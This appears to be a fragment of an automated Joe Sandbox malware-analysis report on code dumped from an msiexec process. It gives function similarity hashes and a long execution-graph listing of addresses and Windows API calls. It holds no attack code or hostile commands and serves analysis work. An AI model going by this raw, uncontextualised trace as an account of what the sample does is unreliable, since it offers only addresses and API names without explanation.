                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                    • String ID: *?$.
                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction ID: 8fe02dd9e9990e1fc09124dcdefb3424ddd44c25939106c62a23f2e3a97c1798
                                                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction Fuzzy Hash: 77519176E0020AAFDF0DCFB8C880AADBBF5EF59314F248169D854E7355E6359A418B90
                                                                                                    Function 21BD16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: : $Se.
                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction ID: c19264670d49b6e7d8fd5cbcd29f93d23c1eb1fb8c4345d12f2d8dae55d2280d
                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction Fuzzy Hash: 8D11E7B6A00249AECB19CFA8D840BDDFBFCEF1D304F504056E545E7222E6705B02C765
                                                                                                    Function 21BD1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21BD2903
                                                                                                      • Part of subcall function 21BD35D2: RaiseException.KERNEL32(?,?,?,21BD2925,00000000,00000000,00000000,?,?,?,?,?,21BD2925,?,21BE21B8), ref: 21BD3632
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 21BD2920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 8f093a7f3b17d08a4cb095f9c002bf7ad6e456174fc2264ed28ec71bb2ffe199
                                                                                                    • Instruction ID: 13cddb696a3b678d8298d4936889e7bc425ace3384952d62bf1aaf6b7c29b497
                                                                                                    • Opcode Fuzzy Hash: 8f093a7f3b17d08a4cb095f9c002bf7ad6e456174fc2264ed28ec71bb2ffe199
                                                                                                    • Instruction Fuzzy Hash: 7CF02837D0024EBB8F0CEAA5EC4595D777C9F15790B9042F4FA18924A0EF32EA16C5C1

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:5.5%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.6%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:80
                                                                                                    execution_graph 37639 44dea5 37640 44deb5 FreeLibrary 37639->37640 37641 44dec3 37639->37641 37640->37641 37642 4147f3 37645 414561 37642->37645 37644 414813 37646 41456d 37645->37646 37647 41457f GetPrivateProfileIntW 37645->37647 37650 4143f1 memset _itow WritePrivateProfileStringW 37646->37650 37647->37644 37649 41457a 37649->37644 37650->37649 37651 4287c1 37652 4287d2 37651->37652 37655 429ac1 37651->37655 37656 428818 37652->37656 37657 42881f 37652->37657 37667 425711 37652->37667 37653 4259da 37714 416760 11 API calls 37653->37714 37665 425ad6 37655->37665 37721 415c56 11 API calls 37655->37721 37688 42013a 37656->37688 37716 420244 96 API calls 37657->37716 37660 4260dd 37715 424251 119 API calls 37660->37715 37666 429a4d 37672 429a66 37666->37672 37673 429a9b 37666->37673 37667->37653 37667->37655 37667->37666 37670 422aeb memset memcpy memcpy 37667->37670 37674 4260a1 37667->37674 37684 4259c2 37667->37684 37687 425a38 37667->37687 37704 4227f0 memset memcpy 37667->37704 37705 422b84 15 API calls 37667->37705 37706 422b5d memset memcpy memcpy 37667->37706 37707 422640 13 API calls 37667->37707 37709 4241fc 11 API calls 37667->37709 37710 42413a 89 API calls 37667->37710 37670->37667 37717 415c56 11 API calls 37672->37717 37683 429a96 37673->37683 37719 416760 11 API calls 37673->37719 37713 415c56 11 API calls 37674->37713 37680 429a7a 37718 416760 11 API calls 37680->37718 37720 424251 119 API calls 37683->37720 37684->37665 37708 415c56 11 API calls 37684->37708 37687->37684 37711 422640 13 API calls 37687->37711 37712 4226e0 12 API calls 37687->37712 37689 42014c 37688->37689 37692 420151 37688->37692 37731 41e466 96 API calls 37689->37731 37691 420162 37691->37667 37692->37691 37693 4201b3 37692->37693 37694 420229 37692->37694 37695 4201b8 37693->37695 37696 4201dc 37693->37696 37694->37691 37697 41fd5e 85 API calls 37694->37697 37722 41fbdb 37695->37722 37696->37691 37701 4201ff 37696->37701 37728 41fc4c 37696->37728 37697->37691 37701->37691 37703 42013a 96 API calls 37701->37703 37703->37691 37704->37667 37705->37667 37706->37667 37707->37667 37708->37653 37709->37667 37710->37667 37711->37687 37712->37687 37713->37653 37714->37660 37715->37665 37716->37667 37717->37680 37718->37683 37719->37683 37720->37655 37721->37653 37723 41fbf8 37722->37723 37725 41fbf1 37722->37725 37736 41ee26 37723->37736 37727 41fc39 37725->37727 37746 4446ce 11 API calls 37725->37746 37727->37691 37732 41fd5e 37727->37732 37729 41ee6b 85 API calls 37728->37729 37730 41fc5d 37729->37730 37730->37696 37731->37692 37734 41fd65 37732->37734 37733 41fdab 37733->37691 37734->37733 37735 41fbdb 85 API calls 37734->37735 37735->37734 37737 41ee41 37736->37737 37738 41ee32 37736->37738 37747 41edad 37737->37747 37750 4446ce 11 API calls 37738->37750 37742 41ee3c 37742->37725 37744 41ee58 37744->37742 37752 41ee6b 37744->37752 37746->37727 37756 41be52 37747->37756 37750->37742 37751 41eb85 11 API calls 37751->37744 37753 41ee70 37752->37753 37754 41ee78 37752->37754 37809 41bf99 85 API calls 37753->37809 37754->37742 37757 41be6f 37756->37757 37758 41be5f 37756->37758 37762 41be8c 37757->37762 37788 418c63 memset memset 37757->37788 37787 4446ce 11 API calls 37758->37787 37760 41be69 37760->37742 37760->37751 37762->37760 37763 41bf3a 37762->37763 37765 41bed1 37762->37765 37775 41bee7 37762->37775 37791 4446ce 11 API calls 37763->37791 37767 41bef0 37765->37767 37769 41bee2 37765->37769 37768 41bf01 37767->37768 37767->37775 37770 41bf24 memset 37768->37770 37771 41bf14 37768->37771 37789 418a6d memset memcpy memset 37768->37789 37777 41ac13 37769->37777 37770->37760 37790 41a223 memset memcpy memset 37771->37790 37775->37760 37792 41a453 85 API calls 37775->37792 37776 41bf20 37776->37770 37778 41ac52 37777->37778 37779 41ac3f memset 37777->37779 37782 41ac6a 37778->37782 37793 41dc14 19 API calls 37778->37793 37780 41acd9 37779->37780 37780->37775 37783 41aca1 37782->37783 37794 41519d 37782->37794 37783->37780 37785 41acc0 memset 37783->37785 37786 41accd memcpy 37783->37786 37785->37780 37786->37780 37787->37760 37788->37762 37789->37771 37790->37776 37791->37775 37793->37782 37797 4175ed 37794->37797 37805 417570 SetFilePointer 37797->37805 37800 41760a ReadFile 37801 417637 37800->37801 37802 417627 GetLastError 37800->37802 37803 4151b3 37801->37803 37804 41763e memset 37801->37804 37802->37803 37803->37783 37804->37803 37806 4175b2 37805->37806 37807 41759c GetLastError 37805->37807 37806->37800 37806->37803 37807->37806 37808 4175a8 GetLastError 37807->37808 37808->37806 37809->37754 37810 417bc5 37811 417c61 37810->37811 37816 417bda 37810->37816 37812 417bf6 UnmapViewOfFile CloseHandle 37812->37812 37812->37816 37814 417c2c 37814->37816 37822 41851e 18 API calls 37814->37822 37816->37811 37816->37812 37816->37814 37817 4175b7 37816->37817 37818 4175d6 CloseHandle 37817->37818 37819 4175c8 37818->37819 37820 4175df 37818->37820 37819->37820 37821 4175ce Sleep 37819->37821 37820->37816 37821->37818 37822->37814 37823 4152c7 malloc 37824 4152ef 37823->37824 37826 4152e2 37823->37826 37827 416760 11 API calls 37824->37827 37827->37826 37828 4148b6 FindResourceW 37829 4148f9 37828->37829 37830 4148cf SizeofResource 37828->37830 37830->37829 37831 4148e0 LoadResource 37830->37831 37831->37829 37832 4148ee LockResource 37831->37832 37832->37829 37833 415308 free 37834 441b3f 37844 43a9f6 37834->37844 37836 441b61 38017 4386af memset 37836->38017 37838 44189a 37839 4418e2 37838->37839 37842 442bd4 37838->37842 37841 4418ea 37839->37841 38018 4414a9 12 API calls 37839->38018 37842->37841 38019 441409 memset 37842->38019 37845 43aa20 37844->37845 37846 43aadf 37844->37846 37845->37846 37847 43aa34 memset 37845->37847 37846->37836 37848 43aa56 37847->37848 37849 43aa4d 37847->37849 38020 43a6e7 37848->38020 38028 42c02e memset 37849->38028 37854 43aad3 38030 4169a7 11 API calls 37854->38030 37855 43aaae 37855->37846 37855->37854 37870 43aae5 37855->37870 37857 43ac18 37859 43ac47 37857->37859 38032 42bbd5 memcpy memcpy memcpy memset memcpy 37857->38032 37860 43aca8 37859->37860 38033 438eed 16 API calls 37859->38033 37863 43acd5 37860->37863 38035 4233ae 11 API calls 37860->38035 38036 423426 11 API calls 37863->38036 37864 43ac87 38034 4233c5 16 API calls 37864->38034 37868 43ace1 38037 439811 162 API calls 37868->38037 37869 43a9f6 160 API calls 37869->37870 37870->37846 37870->37857 37870->37869 38031 439bbb 22 API calls 37870->38031 37872 43acfd 37878 43ad2c 37872->37878 38038 438eed 16 API calls 37872->38038 37874 43ad19 38039 4233c5 16 API calls 37874->38039 37875 43ad58 38040 44081d 162 API calls 37875->38040 37878->37875 37881 43add9 37878->37881 37880 43ae3a memset 37882 43ae73 37880->37882 37881->37881 38044 423426 11 API calls 37881->38044 38045 42e1c0 146 API calls 37882->38045 37883 43adab 38042 438c4e 162 API calls 37883->38042 37885 43ad6c 37885->37846 37885->37883 38041 42370b memset memcpy memset 37885->38041 37887 43adcc 38043 440f84 12 API calls 37887->38043 37888 43ae96 38046 42e1c0 146 API calls 37888->38046 37892 43aea8 37893 43aec1 37892->37893 38047 42e199 146 API calls 37892->38047 37895 43af00 37893->37895 38048 42e1c0 146 API calls 37893->38048 37895->37846 37898 43af1a 37895->37898 37899 43b3d9 37895->37899 38049 438eed 16 API calls 37898->38049 37904 43b3f6 37899->37904 37909 43b4c8 37899->37909 37901 43b60f 37901->37846 38108 4393a5 17 API calls 37901->38108 37902 43af2f 38050 4233c5 16 API calls 37902->38050 38090 432878 12 API calls 37904->38090 37906 43af51 38051 423426 11 API calls 37906->38051 37908 43b4f2 38097 43a76c 21 API calls 37908->38097 37909->37908 38096 42bbd5 memcpy memcpy memcpy memset memcpy 37909->38096 37911 43af7d 38052 423426 11 API calls 37911->38052 37915 43b529 38098 44081d 162 API calls 37915->38098 37916 43b428 37942 43b462 37916->37942 38091 432b60 16 API calls 37916->38091 37917 43af94 38053 423330 11 API calls 37917->38053 37921 43b47e 37931 43b497 37921->37931 38093 42374a memcpy memset memcpy memcpy memcpy 37921->38093 37922 43b544 37933 43b55c 37922->37933 38099 42c02e memset 37922->38099 37923 43afca 38054 423330 11 API calls 37923->38054 37928 43afdb 38055 4233ae 11 API calls 37928->38055 37930 43b56c 37936 43b58a 37930->37936 38101 423330 11 API calls 37930->38101 38094 4233ae 11 API calls 37931->38094 37932 43b4b1 38095 423399 11 API calls 37932->38095 38100 43a87a 162 API calls 37933->38100 37935 43afee 38056 44081d 162 API calls 37935->38056 38102 440f84 12 API calls 37936->38102 37941 43b4c1 38104 42db80 162 API calls 37941->38104 38092 423330 11 API calls 37942->38092 37944 43b592 38103 43a82f 16 API calls 37944->38103 37947 43b5b4 38105 438c4e 162 API calls 37947->38105 37949 43b5cf 38106 42c02e memset 37949->38106 37951 43b1ef 38067 4233c5 16 API calls 37951->38067 37952 43b005 37952->37846 37954 43b01f 37952->37954 38057 42d836 162 API calls 37952->38057 37954->37951 38065 423330 11 API calls 37954->38065 38066 42d71d 162 API calls 37954->38066 37955 43b212 38068 423330 11 API calls 37955->38068 37957 43b087 38058 4233ae 11 API calls 37957->38058 37959 43add4 37959->37901 38107 438f86 16 API calls 37959->38107 37963 43b22a 38069 42ccb5 11 API calls 37963->38069 37965 43b10f 38061 423330 11 API calls 37965->38061 37966 43b23f 38070 4233ae 11 API calls 37966->38070 37968 43b257 38071 4233ae 11 API calls 37968->38071 37972 43b129 38062 4233ae 11 API calls 37972->38062 37973 43b26e 38072 4233ae 11 API calls 37973->38072 37976 43b09a 37976->37965 38059 42cc15 19 API calls 37976->38059 38060 4233ae 11 API calls 37976->38060 37977 43b282 38073 43a87a 162 API calls 37977->38073 37979 43b13c 38063 440f84 12 API calls 37979->38063 37981 43b29d 38074 423330 11 API calls 37981->38074 37984 43b15f 38064 4233ae 11 API calls 37984->38064 37985 43b2af 37987 43b2b8 37985->37987 37988 43b2ce 37985->37988 38075 4233ae 11 API calls 37987->38075 38076 440f84 12 API calls 37988->38076 37991 43b2da 38077 42370b memset memcpy memset 37991->38077 37992 43b2c9 38078 4233ae 11 API calls 37992->38078 37995 43b2f9 38079 423330 11 API calls 37995->38079 37997 43b30b 38080 423330 11 API calls 37997->38080 37999 43b325 38081 423399 11 API calls 37999->38081 38001 43b332 38082 4233ae 11 API calls 38001->38082 38003 43b354 38083 423399 11 API calls 38003->38083 38005 43b364 38084 43a82f 16 API calls 38005->38084 38007 43b370 38085 42db80 162 API calls 38007->38085 38009 43b380 38086 438c4e 162 API calls 38009->38086 38011 43b39e 38087 423399 11 API calls 38011->38087 38013 43b3ae 38088 43a76c 21 API calls 38013->38088 38015 43b3c3 38089 423399 11 API calls 38015->38089 38017->37838 38018->37841 38019->37842 38021 43a6f5 38020->38021 38022 43a765 38020->38022 38021->38022 38109 42a115 38021->38109 38022->37846 38029 4397fd memset 38022->38029 38026 43a73d 38026->38022 38027 42a115 146 API calls 38026->38027 38027->38022 38028->37848 38029->37855 38030->37846 38031->37870 38032->37859 38033->37864 38034->37860 38035->37863 38036->37868 38037->37872 38038->37874 38039->37878 38040->37885 38041->37883 38042->37887 38043->37959 38044->37880 38045->37888 38046->37892 38047->37893 38048->37893 38049->37902 38050->37906 38051->37911 38052->37917 38053->37923 38054->37928 38055->37935 38056->37952 38057->37957 38058->37976 38059->37976 38060->37976 38061->37972 38062->37979 38063->37984 38064->37954 38065->37954 38066->37954 38067->37955 38068->37963 38069->37966 38070->37968 38071->37973 38072->37977 38073->37981 38074->37985 38075->37992 38076->37991 38077->37992 38078->37995 38079->37997 38080->37999 38081->38001 38082->38003 38083->38005 38084->38007 38085->38009 38086->38011 38087->38013 38088->38015 38089->37959 38090->37916 38091->37942 38092->37921 38093->37931 38094->37932 38095->37941 38096->37908 38097->37915 38098->37922 38099->37933 38100->37930 38101->37936 38102->37944 38103->37941 38104->37947 38105->37949 38106->37959 38107->37901 38108->37846 38110 42a175 38109->38110 38112 42a122 38109->38112 38110->38022 38115 42b13b 146 API calls 38110->38115 38112->38110 38113 42a115 146 API calls 38112->38113 38116 43a174 38112->38116 38140 42a0a8 146 API calls 38112->38140 38113->38112 38115->38026 38130 43a196 38116->38130 38131 43a19e 38116->38131 38117 43a306 38117->38130 38160 4388c4 14 API calls 38117->38160 38120 42a115 146 API calls 38120->38131 38122 43a642 38122->38130 38164 4169a7 11 API calls 38122->38164 38126 43a635 38163 42c02e memset 38126->38163 38130->38112 38131->38117 38131->38120 38131->38130 38141 42ff8c 38131->38141 38149 415a91 38131->38149 38153 4165ff 38131->38153 38156 439504 13 API calls 38131->38156 38157 4312d0 146 API calls 38131->38157 38158 42be4c memcpy memcpy memcpy memset memcpy 38131->38158 38159 43a121 11 API calls 38131->38159 38133 42bf4c 14 API calls 38135 43a325 38133->38135 38134 4169a7 11 API calls 38134->38135 38135->38122 38135->38126 38135->38130 38135->38133 38135->38134 38136 42b5b5 memset memcpy 38135->38136 38139 4165ff 11 API calls 38135->38139 38161 42b63e 14 API calls 38135->38161 38162 42bfcf memcpy 38135->38162 38136->38135 38139->38135 38140->38112 38165 43817e 38141->38165 38143 42ff9d 38143->38131 38144 42ff99 38144->38143 38145 42ffe3 38144->38145 38146 42ffd0 38144->38146 38170 4169a7 11 API calls 38145->38170 38169 4169a7 11 API calls 38146->38169 38150 415a9d 38149->38150 38151 415ab3 38150->38151 38152 415aa4 memset 38150->38152 38151->38131 38152->38151 38364 4165a0 38153->38364 38156->38131 38157->38131 38158->38131 38159->38131 38160->38135 38161->38135 38162->38135 38163->38122 38164->38130 38166 438187 38165->38166 38168 438192 38165->38168 38171 4380f6 38166->38171 38168->38144 38169->38143 38170->38143 38173 43811f 38171->38173 38172 438164 38172->38168 38173->38172 38176 437e5e 38173->38176 38199 4300e8 memset memset memcpy 38173->38199 38200 437d3c 38176->38200 38178 437eb3 38178->38173 38179 437ea9 38179->38178 38184 437f22 38179->38184 38215 41f432 38179->38215 38182 437f06 38262 415c56 11 API calls 38182->38262 38189 437f7f 38184->38189 38263 432d4e 38184->38263 38185 437f95 38267 415c56 11 API calls 38185->38267 38187 43802b 38190 4165ff 11 API calls 38187->38190 38189->38185 38189->38187 38191 438054 38190->38191 38226 437371 38191->38226 38194 43806b 38195 438094 38194->38195 38268 42f50e 137 API calls 38194->38268 38197 437fa3 38195->38197 38269 4300e8 memset memset memcpy 38195->38269 38197->38178 38270 41f638 103 API calls 38197->38270 38199->38173 38201 437d69 38200->38201 38204 437d80 38200->38204 38283 437ccb 11 API calls 38201->38283 38203 437d76 38203->38179 38204->38203 38205 437d90 38204->38205 38207 437da3 38204->38207 38205->38203 38287 437ccb 11 API calls 38205->38287 38271 438460 38207->38271 38209 437de8 38286 424f26 122 API calls 38209->38286 38211 437dcb 38211->38209 38284 444283 13 API calls 38211->38284 38213 437dfc 38285 437ccb 11 API calls 38213->38285 38216 41f54d 38215->38216 38222 41f44f 38215->38222 38217 41f466 38216->38217 38317 41c635 memset memset 38216->38317 38217->38182 38217->38184 38222->38217 38224 41f50b 38222->38224 38288 41f1a5 38222->38288 38313 41c06f memcmp 38222->38313 38314 41f3b1 89 API calls 38222->38314 38315 41f398 85 API calls 38222->38315 38224->38216 38224->38217 38316 41c295 85 API calls 38224->38316 38318 41703f 38226->38318 38228 437399 38229 43739d 38228->38229 38232 4373ac 38228->38232 38351 4446ea 11 API calls 38229->38351 38231 4373a7 38231->38194 38325 416935 38232->38325 38234 4373ca 38236 438460 133 API calls 38234->38236 38244 415a91 memset 38234->38244 38247 43758f 38234->38247 38256 437584 38234->38256 38261 437d3c 134 API calls 38234->38261 38333 4251c4 38234->38333 38352 425433 13 API calls 38234->38352 38353 425413 17 API calls 38234->38353 38354 42533e 16 API calls 38234->38354 38355 42538f 16 API calls 38234->38355 38356 42453e 122 API calls 38234->38356 38235 4375bc 38359 415c7d 16 API calls 38235->38359 38236->38234 38239 4375d2 38239->38231 38360 4442e6 11 API calls 38239->38360 38242 4375e2 38242->38231 38361 444283 13 API calls 38242->38361 38244->38234 38357 42453e 122 API calls 38247->38357 38248 4375f4 38254 437620 38248->38254 38255 43760b 38248->38255 38252 43759f 38253 416935 16 API calls 38252->38253 38253->38256 38258 416935 16 API calls 38254->38258 38362 444283 13 API calls 38255->38362 38256->38235 38358 42453e 122 API calls 38256->38358 38258->38231 38260 437612 memcpy 38260->38231 38261->38234 38262->38178 38264 432d65 38263->38264 38265 432d58 38263->38265 38264->38189 38363 432cc4 memset memset memcpy 38265->38363 38267->38197 38268->38195 38269->38197 38270->38178 38272 41703f 11 API calls 38271->38272 38273 43847a 38272->38273 38274 43848a 38273->38274 38275 43847e 38273->38275 38277 438270 133 API calls 38274->38277 38276 4446ea 11 API calls 38275->38276 38282 438488 38276->38282 38278 4384aa 38277->38278 38279 424f26 122 API calls 38278->38279 38278->38282 38280 4384bb 38279->38280 38281 438270 133 API calls 38280->38281 38281->38282 38282->38211 38283->38203 38284->38213 38285->38209 38286->38203 38287->38203 38289 41bc3b 100 API calls 38288->38289 38290 41f1b4 38289->38290 38291 41edad 85 API calls 38290->38291 38298 41f282 38290->38298 38292 41f1cb 38291->38292 38293 41f1f5 memcmp 38292->38293 38294 41f20e 38292->38294 38292->38298 38293->38294 38295 41f21b memcmp 38294->38295 38294->38298 38296 41f326 38295->38296 38299 41f23d 38295->38299 38297 41ee6b 85 API calls 38296->38297 38296->38298 38297->38298 38298->38222 38299->38296 38300 41f28e memcmp 38299->38300 38302 41c8df 55 API calls 38299->38302 38300->38296 38301 41f2a9 38300->38301 38301->38296 38304 41f308 38301->38304 38305 41f2d8 38301->38305 38303 41f269 38302->38303 38303->38296 38306 41f287 38303->38306 38307 41f27a 38303->38307 38304->38296 38311 4446ce 11 API calls 38304->38311 38308 41ee6b 85 API calls 38305->38308 38306->38300 38310 41ee6b 85 API calls 38307->38310 38309 41f2e0 38308->38309 38312 41b1ca memset 38309->38312 38310->38298 38311->38296 38312->38298 38313->38222 38314->38222 38315->38222 38316->38216 38317->38217 38319 417044 38318->38319 38320 41705c 38318->38320 38322 416760 11 API calls 38319->38322 38324 417055 38319->38324 38321 417075 38320->38321 38323 41707a 11 API calls 38320->38323 38321->38228 38322->38324 38323->38319 38324->38228 38326 41693e 38325->38326 38328 41698e 38325->38328 38327 422fd1 memset 38326->38327 38329 41694c 38326->38329 38327->38329 38328->38234 38329->38328 38330 4165a0 11 API calls 38329->38330 38331 416972 38330->38331 38331->38328 38332 422b84 15 API calls 38331->38332 38332->38328 38334 424f07 11 API calls 38333->38334 38335 4251e4 38334->38335 38336 4251f7 38335->38336 38337 4251e8 38335->38337 38340 4250f8 126 API calls 38336->38340 38338 4446ea 11 API calls 38337->38338 38339 4251f2 38338->38339 38339->38234 38341 425209 38340->38341 38343 4384e9 134 API calls 38341->38343 38344 425249 38341->38344 38345 424f74 123 API calls 38341->38345 38347 4250f8 126 API calls 38341->38347 38348 425287 38341->38348 38342 415c7d 16 API calls 38342->38339 38343->38341 38346 424ff0 13 API calls 38344->38346 38344->38348 38345->38341 38349 425266 38346->38349 38347->38341 38348->38342 38349->38348 38350 415be9 memcpy 38349->38350 38350->38348 38351->38231 38352->38234 38353->38234 38354->38234 38355->38234 38356->38234 38357->38252 38358->38235 38359->38239 38360->38242 38361->38248 38362->38260 38363->38264 38369 415cfe 38364->38369 38370 41628e 38369->38370 38375 415d23 __aullrem __aulldvrm 38369->38375 38377 416520 38370->38377 38371 4163ca 38383 416422 11 API calls 38371->38383 38373 416422 10 API calls 38373->38375 38374 416172 memset 38374->38375 38375->38370 38375->38371 38375->38373 38375->38374 38376 415cb9 10 API calls 38375->38376 38376->38375 38378 416574 38377->38378 38379 416527 38377->38379 38378->38131 38379->38378 38381 416544 38379->38381 38384 4156aa 11 API calls 38379->38384 38381->38378 38382 416561 memcpy 38381->38382 38382->38378 38383->38370 38384->38381 38385 41276d 38386 41277d 38385->38386 38428 4044a4 LoadLibraryW 38386->38428 38388 412785 38389 412789 38388->38389 38436 414b81 38388->38436 38392 4127c8 38442 412465 memset ??2@YAPAXI 38392->38442 38394 4127ea 38454 40ac21 38394->38454 38399 412813 38473 40dd07 memset 38399->38473 38400 412827 38478 40db69 memset 38400->38478 38403 412822 38500 4125b6 ??3@YAXPAX DeleteObject 38403->38500 38405 40ada2 _wcsicmp 38407 41283d 38405->38407 38407->38403 38410 412863 CoInitialize 38407->38410 38483 41268e 38407->38483 38408 412966 38501 40b1ab free free 38408->38501 38499 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38410->38499 38413 41296f 38502 40b633 38413->38502 38415 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38420 412957 CoUninitialize 38415->38420 38423 4128ca 38415->38423 38420->38403 38421 4128d0 TranslateAcceleratorW 38422 412941 GetMessageW 38421->38422 38421->38423 38422->38420 38422->38421 38423->38421 38424 412909 IsDialogMessageW 38423->38424 38425 4128fd IsDialogMessageW 38423->38425 38426 41292b TranslateMessage DispatchMessageW 38423->38426 38427 41291f IsDialogMessageW 38423->38427 38424->38422 38424->38423 38425->38422 38425->38424 38426->38422 38427->38422 38427->38426 38429 4044f7 38428->38429 38430 4044cf GetProcAddress 38428->38430 38434 404507 MessageBoxW 38429->38434 38435 40451e 38429->38435 38431 4044e8 FreeLibrary 38430->38431 38432 4044df 38430->38432 38431->38429 38433 4044f3 38431->38433 38432->38431 38433->38429 38434->38388 38435->38388 38437 414b8a 38436->38437 38438 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38436->38438 38506 40a804 memset 38437->38506 38438->38392 38441 414b9e GetProcAddress 38441->38438 38443 4124e0 38442->38443 38444 412505 ??2@YAPAXI 38443->38444 38445 41251c 38444->38445 38449 412521 38444->38449 38528 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38445->38528 38517 444722 38449->38517 38453 41259b wcscpy 38453->38394 38533 40b1ab free free 38454->38533 38458 40a9ce malloc memcpy free free 38460 40ac5c 38458->38460 38459 40ad4b 38468 40ad76 38459->38468 38539 40a9ce 38459->38539 38460->38458 38460->38459 38462 40acf0 38460->38462 38463 40ace7 free 38460->38463 38460->38468 38537 40a8d0 7 API calls 38460->38537 38462->38460 38538 4099f4 malloc memcpy free 38462->38538 38463->38460 38534 40aa04 38468->38534 38469 40ada2 38470 40adc9 38469->38470 38471 40adaa 38469->38471 38470->38399 38470->38400 38471->38470 38472 40adb3 _wcsicmp 38471->38472 38472->38470 38472->38471 38547 40dce0 38473->38547 38475 40dd3a GetModuleHandleW 38552 40dba7 38475->38552 38479 40dce0 3 API calls 38478->38479 38480 40db99 38479->38480 38624 40dae1 38480->38624 38638 402f3a 38483->38638 38485 412766 38485->38403 38485->38410 38486 4126d3 _wcsicmp 38487 4126a8 38486->38487 38487->38485 38487->38486 38489 41270a 38487->38489 38672 4125f8 7 API calls 38487->38672 38489->38485 38641 411ac5 38489->38641 38499->38415 38500->38408 38501->38413 38503 40b640 38502->38503 38504 40b639 free 38502->38504 38505 40b1ab free free 38503->38505 38504->38503 38505->38389 38507 40a83b GetSystemDirectoryW 38506->38507 38508 40a84c wcscpy 38506->38508 38507->38508 38513 409719 wcslen 38508->38513 38511 40a881 LoadLibraryW 38512 40a886 38511->38512 38512->38438 38512->38441 38514 409724 38513->38514 38515 409739 wcscat LoadLibraryW 38513->38515 38514->38515 38516 40972c wcscat 38514->38516 38515->38511 38515->38512 38516->38515 38518 444732 38517->38518 38519 444728 DeleteObject 38517->38519 38529 409cc3 38518->38529 38519->38518 38521 412551 38522 4010f9 38521->38522 38523 401130 38522->38523 38524 401134 GetModuleHandleW LoadIconW 38523->38524 38525 401107 wcsncat 38523->38525 38526 40a7be 38524->38526 38525->38523 38527 40a7d2 38526->38527 38527->38453 38527->38527 38528->38449 38532 409bfd memset wcscpy 38529->38532 38531 409cdb CreateFontIndirectW 38531->38521 38532->38531 38533->38460 38535 40aa14 38534->38535 38536 40aa0a free 38534->38536 38535->38469 38536->38535 38537->38460 38538->38462 38540 40a9e7 38539->38540 38541 40a9dc free 38539->38541 38546 4099f4 malloc memcpy free 38540->38546 38542 40a9f3 38541->38542 38545 40a8d0 7 API calls 38542->38545 38544 40a9f2 38544->38542 38545->38468 38546->38544 38571 409bca GetModuleFileNameW 38547->38571 38549 40dce6 wcsrchr 38550 40dcf5 38549->38550 38551 40dcf9 wcscat 38549->38551 38550->38551 38551->38475 38572 44db70 38552->38572 38556 40dbfd 38575 4447d9 38556->38575 38559 40dc34 wcscpy wcscpy 38601 40d6f5 38559->38601 38560 40dc1f wcscpy 38560->38559 38563 40d6f5 3 API calls 38564 40dc73 38563->38564 38565 40d6f5 3 API calls 38564->38565 38566 40dc89 38565->38566 38567 40d6f5 3 API calls 38566->38567 38568 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38567->38568 38607 40da80 38568->38607 38571->38549 38573 40dbb4 memset memset 38572->38573 38574 409bca GetModuleFileNameW 38573->38574 38574->38556 38577 4447f4 38575->38577 38576 40dc1b 38576->38559 38576->38560 38577->38576 38578 444807 ??2@YAPAXI 38577->38578 38579 44481f 38578->38579 38580 444873 _snwprintf 38579->38580 38581 4448ab wcscpy 38579->38581 38614 44474a 8 API calls 38580->38614 38583 4448bb 38581->38583 38615 44474a 8 API calls 38583->38615 38584 4448a7 38584->38581 38584->38583 38586 4448cd 38616 44474a 8 API calls 38586->38616 38588 4448e2 38617 44474a 8 API calls 38588->38617 38590 4448f7 38618 44474a 8 API calls 